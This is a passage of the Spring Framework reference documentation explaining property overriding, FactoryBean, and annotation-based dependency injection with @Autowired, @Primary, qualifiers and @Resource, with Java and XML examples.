example:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ndataSource.driverClassName=com.mysql.jdbc.Driver\ndataSource.url=jdbc:mysql:mydb\n----\n\nThis example file can be used with a container definition that contains a bean called\n__dataSource__, which has __driver__ and __url__ properties.\n\nCompound property names are also supported, as long as every component of the path\nexcept the final property being overridden is already non-null (presumably initialized\nby the constructors). In this example...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nfoo.fred.bob.sammy=123\n----\n\n... the `sammy` property of the `bob` property of the `fred` property of the `foo` bean\nis set to the scalar value `123`.\n\n[NOTE]\n====\nSpecified override values are always __literal__ values; they are not translated into\nbean references. This convention also applies when the original value in the XML bean\ndefinition specifies a bean reference.\n====\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty overriding with a dedicated configuration element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-override location=\"classpath:override.properties\"\/>\n----\n\n\n\n[[beans-factory-extension-factorybean]]\n=== Customizing instantiation logic with a FactoryBean\n\nImplement the `org.springframework.beans.factory.FactoryBean` interface for objects that\n__are themselves factories__.\n\nThe `FactoryBean` interface is a point of pluggability into the Spring IoC container's\ninstantiation logic. 
If you have complex initialization code that is better expressed in
Java as opposed to a (potentially) verbose amount of XML, you can create your own
`FactoryBean`, write the complex initialization inside that class, and then plug your
custom `FactoryBean` into the container.

The `FactoryBean` interface provides three methods:

* `Object getObject()`: returns an instance of the object this factory creates. The
 instance can possibly be shared, depending on whether this factory returns singletons
 or prototypes.
* `boolean isSingleton()`: returns `true` if this `FactoryBean` returns singletons,
 `false` otherwise.
* `Class getObjectType()`: returns the object type returned by the `getObject()` method
 or `null` if the type is not known in advance.

The `FactoryBean` concept and interface are used in a number of places within the Spring
Framework; more than 50 implementations of the `FactoryBean` interface ship with Spring
itself.

When you need to ask a container for an actual `FactoryBean` instance itself instead of
the bean it produces, preface the bean's id with the ampersand symbol (`&`) when
calling the `getBean()` method of the `ApplicationContext`. So for a given `FactoryBean`
with an id of `myBean`, invoking `getBean("myBean")` on the container returns the
product of the `FactoryBean`; whereas invoking `getBean("&myBean")` returns the
`FactoryBean` instance itself.




[[beans-annotation-config]]
== Annotation-based container configuration

.Are annotations better than XML for configuring Spring?
****
The introduction of annotation-based configurations raised the question of whether this
approach is 'better' than XML. The short answer is __it depends__. The long answer is
that each approach has its pros and cons, and usually it is up to the developer to
decide which strategy suits them better. Due to the way they are defined, annotations
provide a lot of context in their declaration, leading to shorter and more concise
configuration. However, XML excels at wiring up components without touching their source
code or recompiling them. Some developers prefer having the wiring close to the source
while others argue that annotated classes are no longer POJOs and, furthermore, that the
configuration becomes decentralized and harder to control.

No matter the choice, Spring can accommodate both styles and even mix them together.
It's worth pointing out that through its <<beans-java,JavaConfig>> option, Spring allows
annotations to be used in a non-invasive way, without touching the target components'
source code, and that in terms of tooling, all configuration styles are supported by the
https://spring.io/tools/sts[Spring Tool Suite].
****

An alternative to XML setups is provided by annotation-based configuration, which relies
on bytecode metadata for wiring up components instead of angle-bracket declarations.
Instead of using XML to describe a bean wiring, the developer moves the configuration
into the component class itself by using annotations on the relevant class, method, or
field declaration. As mentioned in <<beans-factory-extension-bpp-examples-rabpp>>, using
a `BeanPostProcessor` in conjunction with annotations is a common means of extending the
Spring IoC container. For example, Spring 2.0 introduced the possibility of enforcing
required properties with the <<beans-required-annotation,@Required>> annotation. Spring
2.5 made it possible to follow that same general approach to drive Spring's dependency
injection.
Essentially, the `@Autowired` annotation provides the same capabilities as\ndescribed in <<beans-factory-autowire>> but with more fine-grained control and wider\napplicability. Spring 2.5 also added support for JSR-250 annotations such as\n`@PostConstruct`, and `@PreDestroy`. Spring 3.0 added support for JSR-330 (Dependency\nInjection for Java) annotations contained in the javax.inject package such as `@Inject`\nand `@Named`. Details about those annotations can be found in the\n<<beans-standard-annotations,relevant section>>.\n[NOTE]\n====\nAnnotation injection is performed __before__ XML injection, thus the latter\nconfiguration will override the former for properties wired through both approaches.\n====\nAs always, you can register them as individual bean definitions, but they can also be\nimplicitly registered by including the following tag in an XML-based Spring\nconfiguration (notice the inclusion of the `context` namespace):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t<\/beans>\n----\n\n(The implicitly registered post-processors include\n{api-spring-framework}\/beans\/factory\/annotation\/AutowiredAnnotationBeanPostProcessor.html[`AutowiredAnnotationBeanPostProcessor`],\n {api-spring-framework}\/context\/annotation\/CommonAnnotationBeanPostProcessor.html[`CommonAnnotationBeanPostProcessor`],\n {api-spring-framework}\/orm\/jpa\/support\/PersistenceAnnotationBeanPostProcessor.html[`PersistenceAnnotationBeanPostProcessor`],\nas well as the aforementioned\n{api-spring-framework}\/beans\/factory\/annotation\/RequiredAnnotationBeanPostProcessor.html[`RequiredAnnotationBeanPostProcessor`].)\n\n[NOTE]\n====\n`<context:annotation-config\/>` only looks for annotations on beans in the same\napplication context in which it is defined. This means that, if you put\n`<context:annotation-config\/>` in a `WebApplicationContext` for a `DispatcherServlet`,\nit only checks for `@Autowired` beans in your controllers, and not your services. See\n<<mvc-servlet>> for more information.\n====\n\n\n\n[[beans-required-annotation]]\n=== @Required\n\nThe `@Required` annotation applies to bean property setter methods, as in the following\nexample:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Required\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThis annotation simply indicates that the affected bean property must be populated at\nconfiguration time, through an explicit property value in a bean definition or through\nautowiring. The container throws an exception if the affected bean property has not been\npopulated; this allows for eager and explicit failure, avoiding ``NullPointerException``s\nor the like later on. It is still recommended that you put assertions into the bean\nclass itself, for example, into an init method. 
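
For example, a minimal sketch of such an init-method assertion, reusing the
`SimpleMovieLister` class from above, might look like this:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class SimpleMovieLister {

		private MovieFinder movieFinder;

		@Required
		public void setMovieFinder(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

		// init-method: fails fast even when the class is used outside of a container
		public void init() {
			if (this.movieFinder == null) {
				throw new IllegalStateException("The [movieFinder] property is required.");
			}
		}

	}
----
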
Doing so enforces those required
references and values even when you use the class outside of a container.



[[beans-autowired-annotation]]
=== @Autowired

[NOTE]
====
JSR 330's `@Inject` annotation can be used in place of Spring's `@Autowired` annotation
in the examples below. See <<beans-standard-annotations,here>> for more details.
====

You can apply the `@Autowired` annotation to constructors:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		private final CustomerPreferenceDao customerPreferenceDao;

		@Autowired
		public MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {
			this.customerPreferenceDao = customerPreferenceDao;
		}

		// ...

	}
----

[NOTE]
====
As of Spring Framework 4.3, the `@Autowired` constructor is no longer necessary if the
target bean only defines one constructor. If several constructors are available, at
least one must be annotated to teach the container which one it has to use.
====

As expected, you can also apply the `@Autowired` annotation to "traditional" setter
methods:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class SimpleMovieLister {

		private MovieFinder movieFinder;

		@Autowired
		public void setMovieFinder(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

		// ...

	}
----

You can also apply the annotation to methods with arbitrary names and/or multiple
arguments:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		private MovieCatalog movieCatalog;

		private CustomerPreferenceDao customerPreferenceDao;

		@Autowired
		public void prepare(MovieCatalog movieCatalog,
				CustomerPreferenceDao customerPreferenceDao) {
			this.movieCatalog = movieCatalog;
			this.customerPreferenceDao = customerPreferenceDao;
		}

		// ...

	}
----

You can apply `@Autowired` to fields as well and even mix it with constructors:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		private final CustomerPreferenceDao customerPreferenceDao;

		@Autowired
		private MovieCatalog movieCatalog;

		@Autowired
		public MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {
			this.customerPreferenceDao = customerPreferenceDao;
		}

		// ...

	}
----

It is also possible to provide __all__ beans of a particular type from the
`ApplicationContext` by adding the annotation to a field or method that expects an array
of that type:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		@Autowired
		private MovieCatalog[] movieCatalogs;

		// ...

	}
----

The same applies for typed collections:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		private Set<MovieCatalog> movieCatalogs;

		@Autowired
		public void setMovieCatalogs(Set<MovieCatalog> movieCatalogs) {
			this.movieCatalogs = movieCatalogs;
		}

		// ...

	}
----

[TIP]
====
Your beans can implement the `org.springframework.core.Ordered` interface or use either
the `@Order` or the standard `@Priority` annotation if you want items in the array or list
to be sorted into a specific order.
====

Even typed Maps can be autowired as long as the expected key type is `String`.
The Map
values will contain all beans of the expected type, and the keys will contain the
corresponding bean names:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		private Map<String, MovieCatalog> movieCatalogs;

		@Autowired
		public void setMovieCatalogs(Map<String, MovieCatalog> movieCatalogs) {
			this.movieCatalogs = movieCatalogs;
		}

		// ...

	}
----

By default, the autowiring fails whenever __zero__ candidate beans are available; the
default behavior is to treat annotated methods, constructors, and fields as
indicating __required__ dependencies. This behavior can be changed as demonstrated below.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class SimpleMovieLister {

		private MovieFinder movieFinder;

		@Autowired(required=false)
		public void setMovieFinder(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

		// ...

	}
----

[NOTE]
====
Only __one annotated constructor per-class__ can be marked as __required__, but multiple
non-required constructors can be annotated. In that case, each is considered among the
candidates and Spring uses the __greediest__ constructor whose dependencies can be
satisfied; that is, the constructor that has the largest number of arguments.

`@Autowired`'s __required__ attribute is recommended over the `@Required` annotation.
The __required__ attribute indicates that the property is not required for autowiring
purposes; the property is ignored if it cannot be autowired. `@Required`, on the other
hand, is stronger in that it enforces that the property was set by any means supported
by the container. If no value is injected, a corresponding exception is raised.
====

You can also use `@Autowired` for interfaces that are well-known resolvable
dependencies: `BeanFactory`, `ApplicationContext`, `Environment`, `ResourceLoader`,
`ApplicationEventPublisher`, and `MessageSource`. These interfaces and their extended
interfaces, such as `ConfigurableApplicationContext` or `ResourcePatternResolver`, are
automatically resolved, with no special setup necessary.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		@Autowired
		private ApplicationContext context;

		public MovieRecommender() {
		}

		// ...

	}
----

[NOTE]
====
`@Autowired`, `@Inject`, `@Resource`, and `@Value` annotations are handled by Spring
`BeanPostProcessor` implementations, which in turn means that you __cannot__ apply these
annotations within your own `BeanPostProcessor` or `BeanFactoryPostProcessor` types (if
any). These types must be 'wired up' explicitly via XML or using a Spring `@Bean` method.
====


[[beans-autowired-annotation-primary]]
=== Fine-tuning annotation-based autowiring with @Primary

Because autowiring by type may lead to multiple candidates, it is often necessary to have
more control over the selection process. One way to accomplish this is with Spring's
`@Primary` annotation. `@Primary` indicates that a particular bean should be given
preference when multiple beans are candidates to be autowired to a single-valued
dependency.
If exactly one 'primary' bean exists among the candidates, it will be the\nautowired value.\n\nLet's assume we have the following configuration that defines `firstMovieCatalog` as the\n_primary_ `MovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MovieConfiguration {\n\n\t\t@Bean\n\t\t**@Primary**\n\t\tpublic MovieCatalog firstMovieCatalog() { ... }\n\n\t\t@Bean\n\t\tpublic MovieCatalog secondMovieCatalog() { ... }\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWith such configuration, the following `MovieRecommender` will be autowired with the\n`firstMovieCatalog`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\nThe corresponding bean definitions appear as follows.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\" **primary=\"true\"**>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\n\n[[beans-autowired-annotation-qualifiers]]\n=== Fine-tuning annotation-based autowiring with qualifiers\n\n`@Primary` is an effective way to use autowiring by type with several instances when one\nprimary candidate can be determined. When more control over the selection process is\nrequired, Spring's `@Qualifier` annotation can be used. You can associate qualifier values\nwith specific arguments, narrowing the set of type matches so that a specific bean is\nchosen for each argument. In the simplest case, this can be a plain descriptive value:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Qualifier(\"main\")**\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe `@Qualifier` annotation can also be specified on individual constructor arguments or\nmethod parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate MovieCatalog movieCatalog;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic void prepare(**@Qualifier(\"main\")**MovieCatalog movieCatalog,\n\t\t\t\tCustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.movieCatalog = movieCatalog;\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe corresponding bean definitions appear as follows. 
The bean with qualifier value\n\"main\" is wired with the constructor argument that is qualified with the same value.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"main\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier value=\"action\"\/>**\n\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nFor a fallback match, the bean name is considered a default qualifier value. Thus you\ncan define the bean with an id \"main\" instead of the nested qualifier element, leading\nto the same matching result. However, although you can use this convention to refer to\nspecific beans by name, `@Autowired` is fundamentally about type-driven injection with\noptional semantic qualifiers. This means that qualifier values, even with the bean name\nfallback, always have narrowing semantics within the set of type matches; they do not\nsemantically express a reference to a unique bean id. Good qualifier values are \"main\"\nor \"EMEA\" or \"persistent\", expressing characteristics of a specific component that are\nindependent from the bean `id`, which may be auto-generated in case of an anonymous bean\ndefinition like the one in the preceding example.\n\nQualifiers also apply to typed collections, as discussed above, for example, to\n`Set<MovieCatalog>`. In this case, all matching beans according to the declared\nqualifiers are injected as a collection. This implies that qualifiers do not have to be\nunique; they rather simply constitute filtering criteria. For example, you can define\nmultiple `MovieCatalog` beans with the same qualifier value \"action\", all of which would\nbe injected into a `Set<MovieCatalog>` annotated with `@Qualifier(\"action\")`.\n\n[TIP]\n====\nIf you intend to express annotation-driven injection by name, do not primarily use\n`@Autowired`, even if is technically capable of referring to a bean name through\n`@Qualifier` values. Instead, use the JSR-250 `@Resource` annotation, which is\nsemantically defined to identify a specific target component by its unique name, with\nthe declared type being irrelevant for the matching process. 
`@Autowired` has rather\ndifferent semantics: After selecting candidate beans by type, the specified String\nqualifier value will be considered within those type-selected candidates only, e.g.\nmatching an \"account\" qualifier against beans marked with the same qualifier label.\n\nFor beans that are themselves defined as a collection\/map or array type, `@Resource`\nis a fine solution, referring to the specific collection or array bean by unique name.\nThat said, as of 4.3, collection\/map and array types can be matched through Spring's\n`@Autowired` type matching algorithm as well, as long as the element type information\nis preserved in `@Bean` return type signatures or collection inheritance hierarchies.\nIn this case, qualifier values can be used to select among same-typed collections,\nas outlined in the previous paragraph.\n\nAs of 4.3, `@Autowired` also considers self references for injection, i.e. references\nback to the bean that is currently injected. Note that self injection is a fallback;\nregular dependencies on other components always have precedence. In that sense, self\nreferences do not participate in regular candidate selection and are therefore in\nparticular never primary; on the contrary, they always end up as lowest precedence.\nIn practice, use self references as a last resort only, e.g. for calling other methods\non the same instance through the bean's transactional proxy: Consider factoring out\nthe affected methods to a separate delegate bean in such a scenario. Alternatively,\nuse `@Resource` which may obtain a proxy back to the current bean by its unique name.\n\n`@Autowired` applies to fields, constructors, and multi-argument methods, allowing for\nnarrowing through qualifier annotations at the parameter level. By contrast, `@Resource`\nis supported only for fields and bean property setter methods with a single argument.\nAs a consequence, stick with qualifiers if your injection target is a constructor or a\nmulti-argument method.\n====\n\nYou can create your own custom qualifier annotations. Simply define an annotation and\nprovide the `@Qualifier` annotation within your definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Qualifier**\n\tpublic @interface Genre {\n\n\t\tString value();\n\t}\n----\n\nThen you can provide the custom qualifier on autowired fields and parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Genre(\"Action\")**\n\t\tprivate MovieCatalog actionCatalog;\n\t\tprivate MovieCatalog comedyCatalog;\n\n\t\t@Autowired\n\t\tpublic void setComedyCatalog(**@Genre(\"Comedy\")** MovieCatalog comedyCatalog) {\n\t\t\tthis.comedyCatalog = comedyCatalog;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNext, provide the information for the candidate bean definitions. You can add\n`<qualifier\/>` tags as sub-elements of the `<bean\/>` tag and then specify the `type` and\n`value` to match your custom qualifier annotations. The type is matched against the\nfully-qualified class name of the annotation. Or, as a convenience if no risk of\nconflicting names exists, you can use the short class name. 
Both approaches are\ndemonstrated in the following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"Genre\" value=\"Action\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"example.Genre\" value=\"Comedy\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nIn <<beans-classpath-scanning>>, you will see an annotation-based alternative to\nproviding the qualifier metadata in XML. Specifically, see <<beans-scanning-qualifiers>>.\n\nIn some cases, it may be sufficient to use an annotation without a value. This may be\nuseful when the annotation serves a more generic purpose and can be applied across\nseveral different types of dependencies. For example, you may provide an __offline__\ncatalog that would be searched when no Internet connection is available. First define\nthe simple annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface Offline {\n\n\t}\n----\n\nThen add the annotation to the field or property to be autowired:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Offline**\n\t\tprivate MovieCatalog offlineCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNow the bean definition only needs a qualifier `type`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t**<qualifier type=\"Offline\"\/>**\n\t\t<!-- inject any dependencies required by this bean -->\n\t<\/bean>\n----\n\nYou can also define custom qualifier annotations that accept named attributes in\naddition to or instead of the simple `value` attribute. If multiple attribute values are\nthen specified on a field or parameter to be autowired, a bean definition must match\n__all__ such attribute values to be considered an autowire candidate. 
As an example,\nconsider the following annotation definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface MovieQualifier {\n\n\t\tString genre();\n\n\t\tFormat format();\n\n\t}\n----\n\nIn this case `Format` is an enum:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic enum Format {\n\t\tVHS, DVD, BLURAY\n\t}\n----\n\nThe fields to be autowired are annotated with the custom qualifier and include values\nfor both attributes: `genre` and `format`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Action\")\n\t\tprivate MovieCatalog actionVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.DVD, genre=\"Action\")\n\t\tprivate MovieCatalog actionDvdCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.BLURAY, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyBluRayCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nFinally, the bean definitions should contain matching qualifier values. This example\nalso demonstrates that bean __meta__ attributes may be used instead of the\n`<qualifier\/>` sub-elements. If available, the `<qualifier\/>` and its attributes take\nprecedence, but the autowiring mechanism falls back on the values provided within the\n`<meta\/>` tags if no such qualifier is present, as in the last two bean definitions in\nthe following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Action\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"DVD\"\/>\n\t\t\t<meta key=\"genre\" value=\"Action\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"BLURAY\"\/>\n\t\t\t<meta key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n\n\n[[beans-generics-as-qualifiers]]\n=== Using generics as autowiring qualifiers\n\nIn addition to the `@Qualifier` annotation, it is also possible to use Java generic types\nas an 
implicit form of qualification. For example, suppose you have the following\nconfiguration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic StringStore stringStore() {\n\t\t\treturn new StringStore();\n\t\t}\n\n\t\t@Bean\n\t\tpublic IntegerStore integerStore() {\n\t\t\treturn new IntegerStore();\n\t\t}\n\n\t}\n----\n\nAssuming that beans above implement a generic interface, i.e. `Store<String>` and\n`Store<Integer>`, you can `@Autowire` the `Store` interface and the __generic__ will\nbe used as a qualifier:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Autowired\n\tprivate Store<String> s1; \/\/ <String> qualifier, injects the stringStore bean\n\n\t@Autowired\n\tprivate Store<Integer> s2; \/\/ <Integer> qualifier, injects the integerStore bean\n----\n\nGeneric qualifiers also apply when autowiring Lists, Maps and Arrays:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ Inject all Store beans as long as they have an <Integer> generic\n\t\/\/ Store<String> beans will not appear in this list\n\t@Autowired\n\tprivate List<Store<Integer>> s;\n----\n\n\n\n\n[[beans-custom-autowire-configurer]]\n=== CustomAutowireConfigurer\n\nThe\n{api-spring-framework}\/beans\/factory\/annotation\/CustomAutowireConfigurer.html[`CustomAutowireConfigurer`]\nis a `BeanFactoryPostProcessor` that enables you to register your own custom qualifier\nannotation types even if they are not annotated with Spring's `@Qualifier` annotation.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"customAutowireConfigurer\"\n\t\t\tclass=\"org.springframework.beans.factory.annotation.CustomAutowireConfigurer\">\n\t\t<property name=\"customQualifierTypes\">\n\t\t\t<set>\n\t\t\t\t<value>example.CustomQualifier<\/value>\n\t\t\t<\/set>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe `AutowireCandidateResolver` determines autowire candidates by:\n\n* the `autowire-candidate` value of each bean definition\n* any `default-autowire-candidates` pattern(s) available on the `<beans\/>` element\n* the presence of `@Qualifier` annotations and any custom annotations registered\nwith the `CustomAutowireConfigurer`\n\nWhen multiple beans qualify as autowire candidates, the determination of a \"primary\" is\nthe following: if exactly one bean definition among the candidates has a `primary`\nattribute set to `true`, it will be selected.\n\n\n\n[[beans-resource-annotation]]\n=== @Resource\n\nSpring also supports injection using the JSR-250 `@Resource` annotation on fields or\nbean property setter methods. This is a common pattern in Java EE 5 and 6, for example\nin JSF 1.2 managed beans or JAX-WS 2.0 endpoints. Spring supports this pattern for\nSpring-managed objects as well.\n\n`@Resource` takes a name attribute, and by default Spring interprets that value as the\nbean name to be injected. In other words, it follows __by-name__ semantics, as\ndemonstrated in this example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource(name=\"myMovieFinder\")**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = 